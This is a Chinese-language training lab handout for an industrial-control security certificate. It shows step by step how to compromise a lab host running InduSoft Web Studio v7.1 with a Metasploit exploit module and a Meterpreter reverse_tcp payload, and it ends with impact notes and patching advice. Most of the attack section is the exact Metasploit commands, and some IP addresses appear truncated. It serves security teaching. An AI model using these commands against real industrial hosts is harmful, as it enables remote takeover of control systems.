工控安全职业证书技能实践:工控已知漏洞验证与实战.docxVIP

  • 4
  • 0
  • 约1.55千字
  • 约 6页
  • 2022-07-12 发布于江西
  • 举报

工控安全职业证书技能实践:工控已知漏洞验证与实战.docx

PAGE 17 PAGE 1 GKAQZYZSJNSJ-029 信息安全专业工业互联网安全方向 实验概述 InduSoft Web Studio法国施耐德电气(Schneider Electric)公司的一个嵌入式HMI软件,该软件 是一个功能强大的自动化整合开发工具,提供所有的自动化建构模组来开发人机介面、SCADA 系統以及嵌入式设备解決方案。InduSoft 已整合 Web 技术并充分运用了互联网/内联网连结的优势。目前该软件广泛应用于电力、能源等多个自动化工业领域。此实验主要内容是学习通过网络上提供的InduSoft Web Studio工控软件的漏洞,进而拿到工业控制系统主机的权限。本实验msf工具加载漏洞模块,配置好模块,使之能顾被用于漏洞攻击。以及对工业控制系统软件的简单入侵。 实验目标 拿到InduSoft Web Studio工控软件所在主机的权限 预备知识 熟悉linux的基本语法 熟悉Linux msf工具的使用 建议课时数 4个课时 实验环境准备 实验时硬件环境:单核CPU、2G内存、30G硬盘 需要能够支持系统连接网络的网络环境靶机 winxp sp3 (ip:33) kali linux (ip:32) 工业软件及版本:InduSoft Web Studio v7.1 漏洞exp:/exploits/21837 任务一 在靶机安装工业软件,开启服务 1、在靶机中安装InduSoft Web Studio v7.1工业软件, (如果下载的是iso文件,则连接虚拟机下面光盘图标连接成这个iso。 按照默认步骤,有如下快捷方式生成: 2、开启软件的4322端口服务,通过开始菜单找到Remote Agent,打开Remote Agent界面,点击Start,开启Demo。 开启后出现如下界面: 任务二 攻击机exp导入 1在kali攻击中,如下目录放入下载的exp模块 /usr/share/metasploit-framework/modules/exploits/windows/scada (建议利用secureSRT,来传送文件,或者直接下载到kali里面) 2、进入msf,加载模块 msfconsole (每次加载页面不一样) 3、攻击机运行“search indusoft”命令搜索漏洞 search indusoft 红框处即为我们漏洞模块 任务三 漏洞攻击演示 1、攻击机使用indusoft_webstudio_exec msf6 use exploit/windows/scada/indusoft_webstudio_exec 2指定目的IP地址(靶机IP地址) msf6 exploit(windows/scada/indusoft_webstudio_exec) set RHOST 33 RHOST = 33 3配置文件 msf6 exploit(windows/scada/indusoft_webstudio_exec) set payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/reverse_tcp 4攻击 exploit 成功获取控制权限 5、总结分析 本文复现的漏洞属于第三方软件高危漏洞,可以看到攻击者利用漏洞可以获取目标系统的高权限,进而远程执行未经授权的恶意代码。如果是正在作业的电力、能源等行业安装该软件的相应版本,一旦被攻击,最终可关闭工业设备、篡改工业参数、危害安全仪表系统,请安装该版本软件的客户打满补丁以绝后患。

您可能关注的文档

文档评论(0)

1亿VIP精品文档

相关文档